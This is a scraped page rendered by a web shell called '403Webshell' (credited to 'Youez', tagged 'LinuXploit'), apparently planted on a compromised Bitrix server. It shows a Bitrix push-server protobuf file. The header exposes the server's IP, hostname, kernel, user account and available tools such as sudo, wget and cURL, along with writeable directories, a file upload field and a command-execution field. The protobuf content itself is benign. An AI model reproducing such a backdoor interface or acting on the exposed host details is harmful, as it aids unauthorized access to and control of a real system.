403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /opt/push-server/lib/models/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /opt/push-server/lib/models/response.proto
syntax = "proto3";

import "sender.proto";

option php_namespace = "Bitrix\\Pull\\Protobuf";

message ResponseBatch
{
    repeated Response responses = 1;
}

message Response
{
    oneof command
    {
        OutgoingMessagesResponse outgoingMessages = 1;
        ChannelStatsResponse channelStats = 2;
        JsonResponse serverStats = 3;
        string json = 4;
    }
}

message OutgoingMessagesResponse
{
    repeated OutgoingMessage messages = 1;
}

message OutgoingMessage
{
    bytes id = 1;
    string body = 2;
    uint32 expiry = 3;
    fixed32 created = 4;
    Sender sender = 5;
}

message ChannelStatsResponse
{
    repeated ChannelStats channels = 1;
}

message ChannelStats
{
    bytes id = 1;
    bool isPrivate = 2;
    bool isOnline = 3;
}

message JsonResponse
{
    string json = 1;
}

Youez - 2016 - github.com/yon3zu
LinuXploit